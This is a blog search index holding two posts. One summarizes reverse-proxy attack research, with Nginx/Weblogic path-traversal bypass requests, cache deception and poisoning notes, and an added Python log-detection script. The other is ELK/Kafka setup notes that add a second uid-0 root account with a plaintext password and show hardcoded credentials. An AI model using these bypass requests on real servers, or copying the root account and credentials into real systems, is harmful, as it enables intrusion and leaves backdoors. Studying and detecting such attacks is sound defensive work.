<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title><![CDATA[a-fresh-look-on-reverse-proxy-related-attacks Summary]]></title>
<url>/2020/01/13/a-fresh-look-on-reverse-proxy-related-attacks%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>Preface</h3><p>I recently studied <a href="https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/" target="_blank" rel="external">A Fresh Look On Reverse Proxy Related Attacks</a> in depth; these notes are based on the results of my own experiments.</p>
<h3 id="反向代理如何工作?"><a href="#反向代理如何工作?" class="headerlink" title="反向代理如何工作?"></a>How does a reverse proxy work?</h3><p>A reverse proxy receives requests from the Internet and forwards them to servers on the internal network; to the user it is invisible. The work of a reverse proxy consists of receiving the request, processing it, and forwarding it to the back end.</p>
<p><img src="https://i.imgur.com/hgtrNef.png" alt=""></p>
<h4 id="a-处理请求"><a href="#a-处理请求" class="headerlink" title="a) 处理请求"></a>a) Processing the request</h4><p>Request processing on the proxy consists of the following main steps:</p>
<ol>
<li>Parsing</li>
<li>URL decoding</li>
<li>Path normalization</li>
</ol>
<a id="more"></a>
<p>Many servers support the usual path normalization, for example:</p>
<p>/long/../path/here -> /path/here<br>/long/./path/here -> /long/path/here</p>
<p>But how is <code>/..</code> handled? In Apache it is equivalent to <code>/../</code>, whereas in Nginx it has no effect.</p>
<p>/long/path/here/.. -> /long/path/ - Apache<br>/long/path/here/.. -> /long/path/here/ - Nginx</p>
<blockquote>
<p>Apache Tomcat behaves the same as Apache here.</p>
</blockquote>
<p><code>//</code> is an empty path segment. Nginx collapses it to <code>/</code>, but Apache treats it as a real directory unless it appears at the very beginning of the path.</p>
<p>//long//path//here -> /long/path/here - Nginx<br>//long/path/here -> /long/path/here - Apache<br>/long//path/here -> /long//path/here - Apache</p>
<blockquote>
<p>Some web servers also support odd features: Tomcat and Jetty, for example, accept the special <code>/..;/</code> path, or allow traversal with <code>\..\</code>.</p>
</blockquote>
<p>/long/path/here/..;/ -> /long/path/ - Tomcat</p>
<h4 id="b-应用规则"><a href="#b-应用规则" class="headerlink" title="b) 应用规则"></a>b) Applying rules</h4><p>Forwarding based on path rules.</p>
<p><a href="http://nginx.org/en/docs/http/ngx_http_core_module.html#location" target="_blank" rel="external">http://nginx.org/en/docs/http/ngx_http_core_module.html#location</a></p>
<h4 id="c-转发到后端"><a href="#c-转发到后端" class="headerlink" title="c) 转发到后端"></a>c) Forwarding to the back end</h4><p>Depends on whether the proxy server modifies the request.</p>
<h3 id="案例"><a href="#案例" class="headerlink" title="案例"></a>Cases</h3><h4 id="Nginx"><a href="#Nginx" class="headerlink" title="Nginx"></a>Nginx</h4><p>With or without a trailing slash</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line">location /api/ {</div><div class="line"> proxy_pass http://backend_server/;</div><div class="line"> #proxy_pass http://backend_server;</div><div class="line">}</div></pre></td></tr></table></figure>
<p>With a trailing slash<br><a href="http://domain/api/long/" target="_blank" rel="external">http://domain/api/long/</a> -> <a href="http://backend_server/long/" target="_blank" rel="external">http://backend_server/long/</a></p>
<p>Without a trailing slash<br><a href="http://domain/api/long/" target="_blank" rel="external">http://domain/api/long/</a> -> <a href="http://backend_server/api/long/" target="_blank" rel="external">http://backend_server/api/long/</a></p>
<p>References:<br><a href="https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html" target="_blank" rel="external">https://www.leavesongs.com/PENETRATION/nginx-insecure-configuration.html</a><br><a href="https://www.jianshu.com/p/c751250a5112" target="_blank" rel="external">https://www.jianshu.com/p/c751250a5112</a></p>
<h4 id="Haproxy"><a href="#Haproxy" class="headerlink" title="Haproxy"></a>Haproxy</h4><p>Haproxy is usually deployed as a load balancer. It does very little processing of the request: it does not URL-decode, does not normalize, and does not support absolute URLs at all.</p>
<h3 id="服务端攻击"><a href="#服务端攻击" class="headerlink" title="服务端攻击"></a>Server-side attacks</h3><h4 id="绕过限制"><a href="#绕过限制" class="headerlink" title="绕过限制"></a>Bypassing restrictions</h4><p>When an attacker wants to reach some restricted functionality.</p>
<p>Example 1.</p>
<p>Nginx acts as the reverse proxy and Weblogic is the back-end server. Nginx restricts the admin interface by denying access to paths that begin with <code>/console/</code>.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">location /console/ {</div><div class="line"> deny all;</div><div class="line"> return 403;</div><div class="line">}</div><div class="line"></div><div class="line">location / {</div><div class="line"> proxy_pass http://weblogic;</div><div class="line">}</div></pre></td></tr></table></figure>
<p>Here <code>proxy_pass</code> has no trailing slash, so the request is forwarded to the back end unprocessed. However, Nginx discards everything after <code>#</code>, while Weblogic treats <code>#</code> as an ordinary character. An attacker can therefore reach the admin interface with the following request.</p>
<p><code>GET /#/../console/ HTTP/1.1</code></p>
<p>Example: reaching the Weblogic console<br><code>GET /#/../console/login/LoginForm.jsp HTTP/1.1</code></p>
<h4 id="请求路由错误"><a href="#请求路由错误" class="headerlink" title="请求路由错误"></a>Request routing errors</h4><h5 id="例1"><a href="#例1" class="headerlink" title="例1"></a>Example 1</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">location /to_app {</div><div class="line"> proxy_pass http://weblogic;</div><div class="line">}</div></pre></td></tr></table></figure>
<p>With the configuration above, proxied requests are forwarded only to the single Weblogic back end (<a href="http://weblogic/to_app" target="_blank" rel="external">http://weblogic/to_app</a>), so a request is forwarded to the same path on Weblogic only when it arrives at Nginx under /to_app.</p>
<p>To reach other directories we need to know two things:</p>
<ol>
<li>proxy_pass is configured without a trailing slash on the back-end address</li>
<li>Weblogic supports path parameters (<a href="https://tools.ietf.org/html/rfc3986#section-3.3" target="_blank" rel="external">https://tools.ietf.org/html/rfc3986#section-3.3</a>)</li>
</ol>
<blockquote>
<p>Unlike Tomcat's <code>/..;/..;/</code> traversal, Weblogic treats everything after the first <code>;</code> as a path parameter.</p>
</blockquote>
<p>An attacker can reach any directory with the following request.</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">GET /any_path_on_weblogic;/../to_app HTTP/1.1</div></pre></td></tr></table></figure>
<p>Nginx receives this request, matches the <code>/to_app</code> rule, and forwards <code>/any_path_on_weblogic;/../to_app</code> to the back end. Because of the behaviour described above, Weblogic sees only a request for <code>/any_path_on_weblogic</code>; additional <code>/../</code> can of course be appended after the <code>;</code> to traverse deeper.</p>
<p>Example: reaching /wls-wsat/CoordinatorPortType<br><code>GET /wls-wsat/CoordinatorPortType;/../../to_app HTTP/1.1</code></p>
<p>Example: reaching back-end .jsp files when the Nginx rule only forwards requests ending in .do to the back end</p>
<p><code>GET /bea_wls_internal/.shell.jsp;/../../xx.do HTTP/1.1</code></p>
<h5 id="例2"><a href="#例2" class="headerlink" title="例2"></a>Example 2</h5><p>I heard this is a bug that will not be fixed; translating it proved too hard.</p>
<p>When the proxy rule is <code>location /to_app</code>, the paths <code>/to_app</code>, <code>/to_app/</code> and <code>/to_app_anything</code> (special characters included) all match it, and the characters after the <code>/to_app</code> prefix are appended to the <code>proxy_pass</code> value.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">location /to_app {</div><div class="line"> proxy_pass http://server/any_path/;</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p>With the configuration above, a request for <code>/to_app_anything</code> makes the proxy forward <code>http://server/any_path/_anything</code> to the back end.<br>Combining these behaviours, an attacker can traverse to almost any back-end path as follows.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">GET /to_app../other_path HTTP/1.1 -> http://server/any_path/../other_path</div></pre></td></tr></table></figure></p>
<p>Example: reaching the Weblogic console on the back end<br><code>GET /to_app1../console/login/LoginForm.jsp HTTP/1.1</code></p>
<h5 id="例3"><a href="#例3" class="headerlink" title="例3"></a>Example 3</h5><p>In some setups the reverse proxy routes requests to different back ends based on the Host header. Take Haproxy as an example: since it cannot handle absolute URIs, any back-end host can be reached as follows.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">GET http://unsafe-value/path/ HTTP/1.1</div><div class="line">Host: example1.com</div></pre></td></tr></table></figure></p>
<p>In most cases (Nginx, Haproxy, Varnish) this does not work, but Apache does allow it in certain configurations and versions. Since this vulnerability (CVE-2011-3368) is old, we do not go into it further; the following two links are provided for reference.</p>
<p><a href="https://www.exploit-db.com/exploits/17969" target="_blank" rel="external">https://www.exploit-db.com/exploits/17969</a><br><a href="https://www.contextis.com/de/blog/server-technologies-reverse-proxy-bypass" target="_blank" rel="external">https://www.contextis.com/de/blog/server-technologies-reverse-proxy-bypass</a><br><a href="https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf" target="_blank" rel="external">https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf</a></p>
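<p>As an added example that is not part of the original post or the Acunetix article, the Python below turns the path-handling differences catalogued above (Nginx dropping <code>#</code>, Weblogic path parameters after <code>;</code>, Tomcat/Jetty <code>/..;/</code> and <code>\..\</code>, the glued <code>/to_app../</code> prefix, and the <code>/home.php/x.css</code> cache-deception shape) into detection rules run over access-log lines; the log lines and IP addresses are constructed for the demo.</p>

```python
"""Flag request paths that rely on proxy/back-end normalization mismatches.

Added example, not code from the original post. The rules mirror the path
quirks discussed above; the access-log lines below are constructed test data.
"""
import re
from urllib.parse import unquote

# (rule name, pattern applied to the URL-decoded request target)
RULES = [
    ("fragment-traversal",     re.compile(r"#/\.\.")),            # /#/../console/  (Nginx drops '#')
    ("path-param-traversal",   re.compile(r";/\.\.")),            # /x;/../to_app   (Weblogic ';' param)
    ("tomcat-semicolon-dot",   re.compile(r"/\.\.;/")),           # /..;/           (Tomcat / Jetty)
    ("backslash-traversal",    re.compile(r"\\\.\.\\")),          # \..\            (Tomcat / Jetty)
    ("glued-dotdot",           re.compile(r"[^/]\.\./")),         # /to_app../other (prefix location glue)
    ("dotdot-segment",         re.compile(r"(?:^|/)\.\.(?:/|$)")),  # plain /../ reaching the back end
    ("cache-deception-suffix", re.compile(r"\.(?:php|jsp|do)/.*\.(?:css|js|gif|jpg|png)$", re.I)),
]

# Combined-log-format line: ip ident user [time] "METHOD target PROTO" status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)


def decode_target(target: str, rounds: int = 2) -> str:
    """URL-decode up to `rounds` times so %2e%2e and double encoding become visible."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target


def classify(target: str) -> list:
    """Return the names of every rule the decoded target matches (empty list = clean)."""
    decoded = decode_target(target)
    return [name for name, pattern in RULES if pattern.search(decoded)]


def scan_access_log(lines) -> list:
    """Return (client_ip, raw_target, rule_names) for each line whose target trips a rule."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-format line; skip rather than guess
        names = classify(match.group("target"))
        if names:
            hits.append((match.group("ip"), match.group("target"), names))
    return hits


# Constructed sample log (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Jan/2020:10:00:01 +0000] "GET /to_app/index.do HTTP/1.1" 200 512',
    '203.0.113.9 - - [13/Jan/2020:10:00:02 +0000] "GET /#/../console/login/LoginForm.jsp HTTP/1.1" 200 2048',
    '203.0.113.9 - - [13/Jan/2020:10:00:03 +0000] "GET /wls-wsat/CoordinatorPortType;/../../to_app HTTP/1.1" 200 900',
    '203.0.113.9 - - [13/Jan/2020:10:00:04 +0000] "GET /to_app1../console/login/LoginForm.jsp HTTP/1.1" 200 2048',
    '203.0.113.9 - - [13/Jan/2020:10:00:05 +0000] "GET /static/%2e%2e;/admin/ HTTP/1.1" 404 150',
    '198.51.100.7 - - [13/Jan/2020:10:00:06 +0000] "GET /home.php/nonexistent.css HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, target, names in scan_access_log(SAMPLE_LOG):
        print(f"{ip}\t{target}\t{','.join(names)}")
```

Rules are applied to the decoded target, so a 404 from the proxy is still reported: the point is to see the probe at the edge, before the back end's own normalization decides what it means.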
<h3 id="客户端攻击"><a href="#客户端攻击" class="headerlink" title="客户端攻击"></a>Client-side attacks</h3><h4 id="Web缓存欺骗-Web-Cache-Deception"><a href="#Web缓存欺骗-Web-Cache-Deception" class="headerlink" title="Web缓存欺骗 Web Cache Deception"></a>Web Cache Deception</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line"># Nginx cache configuration</div><div class="line">proxy_cache_path /temp levels=1:2 keys_zone=my_cache:10m inactive=120s;</div><div class="line">location ~ .*\.(gif|jpg|png|css|js)(.*) {</div><div class="line"> proxy_cache my_cache;</div><div class="line"> proxy_pass http://30.3.228.163:7041;</div><div class="line"> proxy_cache_valid 200 302 60m;</div><div class="line"> proxy_set_header X-Real-IP $remote_addr;</div><div class="line"> proxy_ignore_headers Cache-Control Expires Set-Cookie;</div><div class="line"> add_header Nginx-Cache "$upstream_cache_status";</div><div class="line">}</div></pre></td></tr></table></figure>
<p>With this configuration Nginx caches the content of files with the listed extensions. When a URL such as <code>/home.php/nonexistent.css</code> is requested, the response is identical to that of <code>/home.php</code>, and Nginx caches the page; an attacker can then obtain the user's sensitive information by requesting <code>/home.php/nonexistent.css</code>.</p>
<p>References<br><a href="https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf" target="_blank" rel="external">https://www.blackhat.com/docs/us-17/wednesday/us-17-Gil-Web-Cache-Deception-Attack-wp.pdf</a><br><a href="http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html" target="_blank" rel="external">http://omergil.blogspot.ru/2017/02/web-cache-deception-attack.html</a></p>
<h4 id="Web缓存中毒-Practical-Web-Cache-Poisoning"><a href="#Web缓存中毒-Practical-Web-Cache-Poisoning" class="headerlink" title="Web缓存中毒 Practical Web Cache Poisoning"></a>Practical Web Cache Poisoning</h4><p>Add an X-Forwarded-Host (XFH) header and check whether it is reflected in the response.</p>
<blockquote>
<p>The domain name or port of a reverse proxy (load balancer, CDN, etc.) may differ from that of the origin server handling the request; X-Forwarded-Host identifies the host name that was originally used to access it.</p>
</blockquote>
<p><a href="https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf" target="_blank" rel="external">https://i.blackhat.com/us-18/Thu-August-9/us-18-Kettle-Practical-Web-Cache-Poisoning-Redefining-Unexploitable.pdf</a></p>
<h5 id="HTTP响应拆分(CRLF注入)"><a href="#HTTP响应拆分(CRLF注入)" class="headerlink" title="HTTP响应拆分(CRLF注入)"></a>HTTP response splitting (CRLF injection)</h5><table><thead><tr><th>Name</th><th>Meaning</th><th>Escape</th><th>URL encoding</th></tr></thead><tbody><tr><td>CR</td><td>carriage return</td><td>\r</td><td>%0d</td></tr><tr><td>LF</td><td>line feed</td><td>\n</td><td>%0a</td></tr></tbody></table>
<p>The client browser uses \r\n to separate the HTTP headers from the body. Once we can control characters in a response header, we can change how the browser parses the response and thereby carry out malicious actions.</p>
<h5 id="请求走私-HTTP-Request-Smuggler"><a href="#请求走私-HTTP-Request-Smuggler" class="headerlink" title="请求走私 HTTP Request Smuggler"></a>HTTP Request Smuggling</h5><p><a href="https://paper.seebug.org/1048/?from=timeline&isappinstalled=0" target="_blank" rel="external">https://paper.seebug.org/1048/?from=timeline&isappinstalled=0</a></p>
]]></content>
</entry>
<entry>
<title><![CDATA[ELK]]></title>
<url>/2019/03/19/ELK/</url>
<content type="html"><![CDATA[<h2 id="指南"><a href="#指南" class="headerlink" title="指南"></a>Guide</h2><p><a href="https://elkguide.elasticsearch.cn/logstash/get-start/install.html" target="_blank" rel="external">https://elkguide.elasticsearch.cn/logstash/get-start/install.html</a></p>
<h2 id="架构"><a href="#架构" class="headerlink" title="架构"></a>Architecture</h2><p>Elasticsearch: real-time full-text search and analytics engine<br>Logstash: log collection, parsing and filtering<br>Kibana: graphical presentation of the data</p>
<p><img src="http://static.open-open.com/news/uploadImg/20150716/20150716205233_183.png" alt=""></p>
<p>Server (producer) Beats -> Zookeeper Kafka topic -> (ELK clusters split by business function) Logstash (consumer) -> ES -> Kibana (watch for sensitive information leaking through logs)</p>
<p>Servers<br>/etc/hosts<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">30.3.229.120 develk01</div><div class="line">30.3.229.121 develk02</div><div class="line">30.3.229.122 develk03</div><div class="line">30.3.229.123 devkafka01</div><div class="line">30.3.229.124 devkafka02</div><div class="line">30.3.229.125 devkafka03</div></pre></td></tr></table></figure></p>
<p>Add a uid-0 user<br>useradd -u 0 -o -g root -G root -d /root/ user1<br>echo "user1":"passw0rD" | chpasswd</p>
<a id="more"></a>
<h2 id="安装"><a href="#安装" class="headerlink" title="安装"></a>Installation</h2><p>Upgrade Java to 1.8</p>
<p>Remove the older Java<br>rpm -qa | grep jdk<br>yum -y remove jdk-1.7.0_79-fcs.x86_64<br>yum -y list java*<br>yum -y install java-1.8.0-openjdk.x86_64<br>rpm -i jdk-8u171-linux-x64.rpm<br>rpm -qa | grep logstash<br>rpm -e --nodeps logstash-5.6.10-1.noarch</p>
<p>Version selection</p>
<p>Beats<br>Elasticsearch<br>Elasticsearch Hadoop<br>Kibana<br>Logstash<br>X-Pack</p>
<h3 id="Elasticsearch"><a href="#Elasticsearch" class="headerlink" title="Elasticsearch"></a>Elasticsearch</h3><p>/etc/elasticsearch/elasticsearch.yml # main ES configuration file<br>/etc/elasticsearch/jvm.options # JVM settings such as heap size<br>/etc/elasticsearch/log4j2.properties # logging configuration<br>/var/lib/elasticsearch # default data location</p>
<p>Cluster configuration</p>
<p>/etc/elasticsearch/elasticsearch.yml </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line">cluster.name: elk-cluster</div><div class="line">node.name: ${HOSTNAME}</div><div class="line">#node.master: true</div><div class="line">#node.data: true</div><div class="line">network.host: 0.0.0.0</div><div class="line">http.port: 9200</div><div class="line">path.data: /data/els/data</div><div class="line">path.logs: /data/els/logs</div><div class="line">bootstrap.memory_lock: false</div><div class="line">bootstrap.system_call_filter: false</div><div class="line">discovery.zen.ping.unicast.hosts: ["develk01", "develk02", "develk03"]</div><div class="line">discovery.zen.minimum_master_nodes: 2</div></pre></td></tr></table></figure>
<p>/etc/security/limits.conf</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">* soft nofile 65536</div><div class="line">* hard nofile 65536</div></pre></td></tr></table></figure>
<p>Startup errors</p>
<p>Java HotSpot(TM) 64-Bit Server VM warning: INFO: os::commit_memory(0x0000000085330000, 2060255232, 0) failed; error='Cannot allocate memory' (errno=12)</p>
<p>/etc/elasticsearch/jvm.options</p>
<p>-Xms512m<br>-Xmx512m</p>
<p>[2]: max number of threads [1832] for user [elasticsearch] is too low, increase to at least [2048]</p>
<p>ulimit -u 2048</p>
<p>Create the data directories<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line">rm -rf /data/</div><div class="line">mkdir -p /data/els/{logs,data}</div><div class="line">chown -R elasticsearch.elasticsearch /data/*</div><div class="line">service elasticsearch start</div><div class="line">or</div><div class="line">bin/elasticsearch -d</div></pre></td></tr></table></figure></p>
<p>View the nodes</p>
<p><a href="http://30.3.229.120:9200/_cat/nodes?pretty" target="_blank" rel="external">http://30.3.229.120:9200/_cat/nodes?pretty</a></p>
<h4 id="常用操作"><a href="#常用操作" class="headerlink" title="常用操作"></a>Common operations</h4><p>List indices<br><code>curl http://localhost:9200/_cat/indices?v</code></p>
<p>Delete an index<br><code>curl -u elastic:changeme -XDELETE http://localhost:9200/my_index</code></p>
<p>/_cat/health?v<br>/_cat/nodes?v </p>
<p>Install x-pack<br><code>bin/elasticsearch-plugin install x-pack</code></p>
<p>Change the default x-pack password<br><code>curl -XPUT -u elastic 'localhost:9200/_xpack/security/user/elastic/_password' -d '{"password" : "dfh*&(dUJ"}'</code></p>
<h4 id="elasticsearch-head-监控"><a href="#elasticsearch-head-监控" class="headerlink" title="elasticsearch-head 监控"></a>elasticsearch-head monitoring</h4><p>yum install nodejs<br>yum install npm<br>npm install -g grunt-cli<br>git config --global https.proxy <a href="http://127.0.0.1:1080" target="_blank" rel="external">http://127.0.0.1:1080</a><br>git clone git://github.com/mobz/elasticsearch-head.git<br>npm config set strict-ssl false<br>npm config set registry <a href="https://registry.npm.taobao.org" target="_blank" rel="external">https://registry.npm.taobao.org</a><br>npm config set proxy <a href="http://127.0.0.1:1080" target="_blank" rel="external">http://127.0.0.1:1080</a><br>npm info express<br>npm install<br>grunt server</p>
<p>Run in the background<br>nohup grunt server &</p>
<p><a href="http://localhost:9100" target="_blank" rel="external">http://localhost:9100</a></p>
<h3 id="Logstash"><a href="#Logstash" class="headerlink" title="Logstash"></a>Logstash</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div></pre></td><td class="code"><pre><div class="line">[logstash-5.x]</div><div class="line">name=Elastic repository for 5.x packages</div><div class="line">baseurl=https://artifacts.elastic.co/packages/5.x/yum</div><div class="line">gpgcheck=1</div><div class="line">gpgkey=https://artifacts.elastic.co/GPG-KEY-elasticsearch</div><div class="line">enabled=1</div><div class="line">autorefresh=1</div><div class="line">type=rpm-md</div></pre></td></tr></table></figure>
<p>/etc/logstash/conf.d/elk.conf</p>
<p>input –> filter –> output</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> syslog {</div><div class="line"> syslog_field => "syslog" # default message</div><div class="line"> port => 514</div><div class="line"> }</div><div class="line"> beats {</div><div class="line"> port => 5044</div><div class="line"> }</div><div class="line">}</div><div class="line">filter {</div><div class="line">}</div><div class="line">output {</div><div class="line"> elasticsearch {</div><div class="line"> hosts => ["192.168.200.109:9200"]</div><div class="line"> index => "test-%{+YYYY.MM}" </div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure>
<p>Start logstash<br><code>nohup bin/logstash --debug --path.settings /etc/logstash/ -f config/test.conf > ls.log 2>&1 &</code><br>Multiple instances<br>bin/logstash -f config/syslog.conf --path.data=/tmp</p>
<p><a href="https://www.elastic.co/guide/en/logstash/5.6/config-examples.html" target="_blank" rel="external">https://www.elastic.co/guide/en/logstash/5.6/config-examples.html</a></p>
<p>Write to kafka<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line">input {</div><div class="line"> stdin{}</div><div class="line">}</div><div class="line">output {</div><div class="line"> kafka {</div><div class="line"> topic_id => "test"</div><div class="line"> codec => plain {</div><div class="line"> format => "%{message}"</div><div class="line"> charset => "UTF-8"</div><div class="line"> }</div><div class="line"> bootstrap_servers => "192.168.6.22:9092"</div><div class="line"> }</div><div class="line"> stdout{</div><div class="line"> codec => rubydebug</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p>Read from kafka<br>Unlike older versions, versions after 5.0 connect to the kafka broker addresses rather than to zk.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">input{</div><div class="line"> kafka{</div><div class="line"> bootstrap_servers => ["192.168.6.22:9092"]</div><div class="line"> #client_id => "test"</div><div class="line"> group_id => "test"</div><div class="line"> auto_offset_reset => "latest"</div><div class="line"> consumer_threads => 5</div><div class="line"> decorate_events => true</div><div class="line"> topics => ["test"]</div><div class="line"> }</div><div class="line">}</div><div class="line">output{</div><div class="line"> elasticsearch { </div><div class="line"> hosts => ["127.0.0.1:9200"] </div><div class="line"> index => "test-%{+YYYY.MM}"</div><div class="line"> user => 'elastic'</div><div class="line"> password => 'changeme'</div><div class="line"> </div><div class="line"> }</div><div class="line"> stdout{</div><div class="line"> codec => rubydebug</div><div class="line"> }</div><div class="line">}</div></pre></td></tr></table></figure></p>
<p>Multiple processes</p>
<p>bin/logstash -f config/rsyslog.conf --path.data=/tmp</p>
<p>Install x-pack monitoring<br>logstash-plugin install file:///tmp/x-pack-5.6.10.zip</p>
<p>nano config/logstash.yml </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line">xpack.monitoring.elasticsearch.url: ["http://10.2.0.27:9200"] </div><div class="line">xpack.monitoring.elasticsearch.username: "elastic" </div><div class="line">xpack.monitoring.elasticsearch.password: "dfh*&(dUJ"</div><div class="line">xpack.monitoring.enabled: true</div><div class="line">xpack.monitoring.collection.interval: 10s</div></pre></td></tr></table></figure>
<h3 id="Kafka"><a href="#Kafka" class="headerlink" title="Kafka"></a>Kafka</h3><p>Topic<br>Kafka sorts message feeds into categories; each category of messages is called a topic.<br>Producer<br>An object that publishes messages is called a topic producer.<br>Consumer<br>An object that subscribes to topics and processes the published messages is called a consumer.<br>Broker<br>Published messages are stored in a group of servers called the Kafka cluster. Each server in the cluster is a broker. Consumers can subscribe to one or more topics and pull data from the brokers to consume the published messages.</p>
<p>Because brokers organise data as topic -> partitions, ordering is guaranteed within a partition but not across partitions. Consumers can therefore keep their own read position, the offset, per partition.</p>
<p>Compatibility<br>If you use logstash 5.x, choose kafka version 0.10.0.x<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"># |==========================================================</div><div class="line"># |Kafka Client Version |Logstash Version |Plugin Version |Why?</div><div class="line"># |0.8 |2.0.0 - 2.x.x |<3.0.0 |Legacy, 0.8 is still popular </div><div class="line"># |0.9 |2.0.0 - 2.3.x | 3.x.x |Works with the old Ruby Event API (`event['product']['price'] = 10`) </div><div class="line"># |0.9 |2.4.x - 5.x.x | 4.x.x |Works with the new getter/setter APIs (`event.set('[product][price]', 10)`)</div><div class="line"># |0.10.0.x |2.4.x - 5.x.x | 5.x.x |Not compatible with the <= 0.9 broker</div><div class="line"># |==========================================================</div></pre></td></tr></table></figure></p>
<p>wget <a href="http://mirrors.hust.edu.cn/apache/kafka/0.11.0.2/kafka-0.11.0.2-src.tgz" target="_blank" rel="external">http://mirrors.hust.edu.cn/apache/kafka/0.11.0.2/kafka-0.11.0.2-src.tgz</a></p>
<p>Configure server.properties<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">broker.id=0</div><div class="line">listeners=PLAINTEXT://kafka01:9092</div><div class="line">advertised.listeners=PLAINTEXT://kafka01:9092</div></pre></td></tr></table></figure></p>
<p>Adjust the JVM heap size in the start script<br><code>export KAFKA_HEAP_OPTS="-Xmx512M -Xms256M"</code></p>
<p>Start the services<br><code>nohup bin/zookeeper-server-start.sh config/zookeeper.properties > zk.out 2>&1 &</code><br><code>nohup bin/kafka-server-start.sh config/server.properties > kafka.out 2>&1 &</code></p>
